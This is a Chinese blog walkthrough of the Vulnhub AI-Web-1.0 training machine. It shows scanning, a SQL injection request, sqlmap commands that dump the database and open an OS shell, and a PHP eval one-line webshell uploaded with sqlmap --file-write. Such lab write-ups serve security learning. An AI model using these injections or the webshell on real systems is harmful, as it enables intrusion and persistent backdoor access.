Vulnhub靶场AI-WEB-1.0打靶教程

燕雀安知鸿鹄之志哉.

已于 2024-06-09 13:31:14 修改

阅读量841

点赞数 16

分类专栏：靶场打靶机 # Vulnhub靶机文章标签：网络安全系统安全 web安全笔记经验分享数据库

于 2024-05-22 08:00:00 首次发布

本文链接：https://blog.csdn.net/weixin_68416970/article/details/139032444

版权

靶场打靶机同时被 2 个专栏收录

32 篇文章 0 订阅

订阅专栏

Vulnhub靶机

4 篇文章 0 订阅

订阅专栏

下载地址：https://download.vulnhub.com/aiweb/AI-Web-1.0.7z

我们从站点信息收集开始，到漏洞攻击，再通过多方法拿到shell，提权benw。

我们使用kali进行攻击，靶机是AI WEB 1.0

kali的IP：192.168.202.128（终端窗口输 ifconfig）

WEBAI1.0的IP：未知

站点信息收集

注意：要在root管理员权限下进行

c段扫描

使用arp-scan扫描

-l （扫描c段）

arp-scan -l

在这里我们可以分析靶机的IP是192.168.202.147

端口扫描

使用 nmap 扫描

nmap 192.168.202.147 -sT -v -T4

只发现了80端口

目录扫描

先访问一下网页

发现什么也没有

使用 dirsearch 扫描

dirsearch -u http://192.168.202.147/

尝试访问 robots.txt 里的内容

访问 /m3diNf0/ 发现不能正常访问

访问 /se3reTdir777/uploads/ ，发现无权限（这里出现了一点小错误，按理说应该是放回页面，可以用来后面获得shell之后上传一句话木马，非常抱歉，因为我也是刚开始渗透测试方向的学习，技术不是很成熟，等我解决了之后再回来修改、补充文章，不过放心，不影响后面获得shell的操作）

接着对 /m3diNf0/ 和 /se3reTdir777/uploads/ 进行扫描

dirsearch -u http://192.168.202.147/m3diNf0/

/se3reTdir777/uploads/没发现，在/m3diNf0/发现了info.php，访问info.php

http://192.168.202.147/m3diNf0/info.php

发现是phpinfo的页面

再扫描se3reTdir777

dirsearch什么也没扫出来，换dirb扫描

dirb "http://192.168.202.147/se3reTdir777/"

发现了一个 index.php ，访问它

http://192.168.202.147/se3reTdir777/index.php

发现是一个信息查询的页面，尝试sql注入，输入 1’

页面报错，存在sql注入漏洞

漏洞利用

使用 burp 抓包

POST /se3reTdir777/index.php HTTP/1.1
Host: 192.168.202.147
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://192.168.202.147
Connection: close
Referer: http://192.168.202.147/se3reTdir777/index.php
Upgrade-Insecure-Requests: 1

uid=1%27&Operation=Submit

这是抓到的包，注入点是uid=1%27&Operation=Submit

查询数据库名

使用sqlmap 注入

sqlmap -u  "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --dbs

发现了两个数据库：aiweb1 、 information_schema，以及数据库的版本大于5.6的信息

查询数据库下的表

-D 数据库名

sqlmap -u  "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" -D aiweb1 --tables

得到了两个表名： user 、systemUser ，再通过-T 查询表中的字段名

查询表中的字段名

-T 表名

sqlmap -u  "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" -D aiweb1 -T user --columns

得到了3个字段： firstName、 id、 lastName

查询字段中的数据

-C 字段名

sqlmap -u  "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" -D aiweb1 -T user -C id --dump

没有什么有用信息

--os-shell

level 指定数据库类型为mysql，级别为3

--os-shell执行条件：

网站必须是root权限
必须知道网站的绝对路径
secure_file_priv无限制

sqlmap -u  "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --level=3 --os-shell

这里选4 PHP

这里选2输入绝对路径

已经知道m3diNf0和se3reTdir777 两个目录，然后找绝对目录，返回刚才的info.php页面，按 CTRL + f，搜索 m3diNf0和se3reTdir777 这两个目录，se3reTdir777没发现，m3diNf0 如下图所示

由此可以得到绝对路径是： /home/www/html/web1x443290o2sdf92213/

还记得刚才我们找到一个可以上传文件的页面se3reTdir777/uploads/刚好符合它的绝对目录为：

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

到这里我们就获得了对方的shell，已经算攻击靶机成功了

上传一句话木马进而提权

先用 vim 编辑模式写一个一句话木马

vim 1.php

进入 vim 编辑器后，按“i”键进入插入模式，输入

<?php @eval($_POST['1'])?>

按“Esc”键退出插入模式，依次输入" :wq " 保存并退出 vim 编辑器

–file-write:去读取木马文件
–file-dest:后面加要存放文件的地址

sqlmap -u "http://192.168.202.147/se3reTdir777/index.php" --data "uid=1%27&Operation=Submit" --file-write "/home/kali/1.php" --file-dest "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php"